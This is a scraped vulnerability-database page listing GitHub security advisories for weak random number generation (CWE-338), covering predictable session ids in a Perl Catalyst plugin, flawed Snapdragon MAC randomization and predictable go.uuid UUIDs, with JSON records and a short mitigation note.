  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-32WX-J5GV-PMFP

Vulnerability from github – Published: 2025-07-17 15:32 – Updated: 2025-07-17 21:32
VLAI
Details

Catalyst::Plugin::Session before version 0.44 for Perl generates session ids insecurely.

The session id is generated from a (usually SHA-1) hash of a simple counter, the epoch time, the built-in rand function, the PID and the current Catalyst context. This information is of low entropy. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage.

Predicable session ids could allow an attacker to gain access to systems.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-40924"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-17T14:15:31Z",
    "severity": "MODERATE"
  },
  "details": "Catalyst::Plugin::Session before version 0.44 for Perl generates session ids insecurely.\n\nThe session id is generated from a (usually SHA-1) hash of a simple counter, the epoch time, the built-in rand function, the PID and the current Catalyst context. This information is of low entropy. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage.\n\nPredicable session ids could allow an attacker to gain access to systems.",
  "id": "GHSA-32wx-j5gv-pmfp",
  "modified": "2025-07-17T21:32:11Z",
  "published": "2025-07-17T15:32:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40924"
    },
    {
      "type": "WEB",
      "url": "https://github.com/perl-catalyst/Catalyst-Plugin-Session/pull/5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/perl-catalyst/Catalyst-Plugin-Session/commit/c0e2b4ab1e42ebce1008286db8c571b6ee98c22c.patch"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/HAARG/Catalyst-Plugin-Session-0.43/source/lib/Catalyst/Plugin/Session.pm#L632"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-338H-X8VX-J29W

Vulnerability from github – Published: 2022-05-13 01:52 – Updated: 2022-05-13 01:52
VLAI
Details

In Snapdragon (Automobile, Mobile, Wear) in version IPQ8074, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6574AU, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 820A, SD 835, SD 845, SD 850, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, SDM710, Snapdragon_High_Med_2016, MAC address randomization performed during probe requests is not done properly due to a flawed RNG which produced repeating output much earlier than expected.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-5837"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-20T13:29:00Z",
    "severity": "HIGH"
  },
  "details": "In Snapdragon (Automobile, Mobile, Wear) in version IPQ8074, MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, QCA6574AU, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 450, SD 625, SD 820A, SD 835, SD 845, SD 850, SDA660, SDM429, SDM439, SDM630, SDM632, SDM636, SDM660, SDM710, Snapdragon_High_Med_2016, MAC address randomization performed during probe requests is not done properly due to a flawed RNG which produced repeating output much earlier than expected.",
  "id": "GHSA-338h-x8vx-j29w",
  "modified": "2022-05-13T01:52:55Z",
  "published": "2022-05-13T01:52:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5837"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2018-07-01#qualcomm-closed-source-components"
    },
    {
      "type": "WEB",
      "url": "https://www.qualcomm.com/company/product-security/bulletins"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-33M6-Q9V5-62R7

Vulnerability from github – Published: 2023-02-07 22:57 – Updated: 2024-09-19 13:39
VLAI
Summary
go.uuid has Predictable UUID Identifiers
Details

CVE Description for go.uuid

A flaw was found in github.com/satori/go.uuid in versions from commit 0ef6afb2f6cdd6cdaeee3885a95099c63f18fc8c to d91630c8510268e75203009fe7daf2b8e1d60c45. Due to insecure randomness in the g.rand.Read function the generated UUIDs are predictable for an attacker.

Update on 19 September 2024 -- This vulnerability never existed in sif

The official NIST CVE-2021-3538 record says:

A flaw was found in github.com/satori/go.uuid in versions from commit 0ef6afb2f6cdd6cdaeee3885a95099c63f18fc8c to d91630c8510268e75203009fe7daf2b8e1d60c45.

That commit and that fix were never in a tagged release of satori/go.uuid, and prior to this announcement sif had used the last tag, 1.2.0. The NIST record says version 1.2.0 was vulnerable, but that's not true. So sif was never vulnerable to this. Also, beginning with version 2.0.0, sif does not use satori/go.uuid anymore.

This update was made in response to issue #243 which has more details.

The original, incorrect sif vulnerability description is below.


Impact

The siftool new command produces predictable UUID identifiers due to insecure randomness in the version of the github.com/satori/go.uuid module used as a dependency.

Patches

A patch is available in version >= v1.2.2 of the module. Users are encouraged to upgrade.

Fixed by https://github.com/hpcng/sif/pull/90

Workarounds

Users passing CreateInfo struct should ensure the ID field is generated using a version of github.com/satori/go.uuid that is not vulnerable to this issue. Unfortunately, the latest tagged release is vulnerable to this issue. One way to obtain a non-vulnerable version is:

go get -u github.com/satori/go.uuid@v1.2.1-0.20180404165556-75cca531ea76

References

https://github.com/satori/go.uuid/issues/73

For more information

If you have any questions or comments about this advisory:

Open an issue in https://github.com/hpcng/sif/issues

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/satori/go.uuid"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.1-0.20180103161547-0ef6afb2f6cd"
            },
            {
              "fixed": "1.2.1-0.20180404165556-75cca531ea76"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3538"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-02-07T22:57:53Z",
    "nvd_published_at": "2021-06-02T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### CVE Description for go.uuid\nA flaw was found in github.com/satori/go.uuid in versions from commit 0ef6afb2f6cdd6cdaeee3885a95099c63f18fc8c to d91630c8510268e75203009fe7daf2b8e1d60c45. Due to insecure randomness in the g.rand.Read function the generated UUIDs are predictable for an attacker.\n\n### Update on 19 September 2024 -- This vulnerability never existed in sif\n\nThe [official NIST CVE-2021-3538 record](https://nvd.nist.gov/vuln/detail/CVE-2021-3538) says:\n\n\u003e A flaw was found in github.com/satori/go.uuid in versions from commit 0ef6afb2f6cdd6cdaeee3885a95099c63f18fc8c to d91630c8510268e75203009fe7daf2b8e1d60c45. \n\nThat commit and that fix were never in a tagged release of satori/go.uuid, and prior to this announcement sif had used the last tag, 1.2.0.  The NIST record says version 1.2.0 was vulnerable, but that\u0027s not true.   So sif was never vulnerable to this.  Also, beginning with version 2.0.0, sif does not use satori/go.uuid anymore.\n\nThis update was made in response to issue #243 which has more details.\n\nThe original, incorrect sif vulnerability description is below.\n\n-------------\n\n### Impact\n\nThe siftool new command produces predictable UUID identifiers due to insecure randomness in the version of the `github.com/satori/go.uuid` module used as a dependency.\n\n### Patches\n\nA patch is available in version \u003e= v1.2.2 of the module. Users are encouraged to upgrade.\n\nFixed by https://github.com/hpcng/sif/pull/90\n\n### Workarounds\n\nUsers passing CreateInfo struct should ensure the ID field is generated using a version of github.com/satori/go.uuid that is not vulnerable to this issue. Unfortunately, the latest tagged release is vulnerable to this issue. One way to obtain a non-vulnerable version is:\n\n`go get -u github.com/satori/go.uuid@v1.2.1-0.20180404165556-75cca531ea76`\n\n### References\n\nhttps://github.com/satori/go.uuid/issues/73\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\nOpen an issue in https://github.com/hpcng/sif/issues",
  "id": "GHSA-33m6-q9v5-62r7",
  "modified": "2024-09-19T13:39:25Z",
  "published": "2023-02-07T22:57:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apptainer/sif/security/advisories/GHSA-33m6-q9v5-62r7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hpcng/sif/security/advisories/GHSA-33m6-q9v5-62r7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3538"
    },
    {
      "type": "WEB",
      "url": "https://github.com/satori/go.uuid/issues/73"
    },
    {
      "type": "WEB",
      "url": "https://github.com/satori/go.uuid/pull/75"
    },
    {
      "type": "WEB",
      "url": "https://github.com/satori/go.uuid/commit/75cca531ea763666bc46e531da3b4c3b95f64557"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1954376"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/satori/go.uuid"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2022-0244"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSATORIGOUUID-72488"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "go.uuid has Predictable UUID Identifiers"
}

Mitigation
Implementation

Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux.

No CAPEC attack patterns related to this CWE.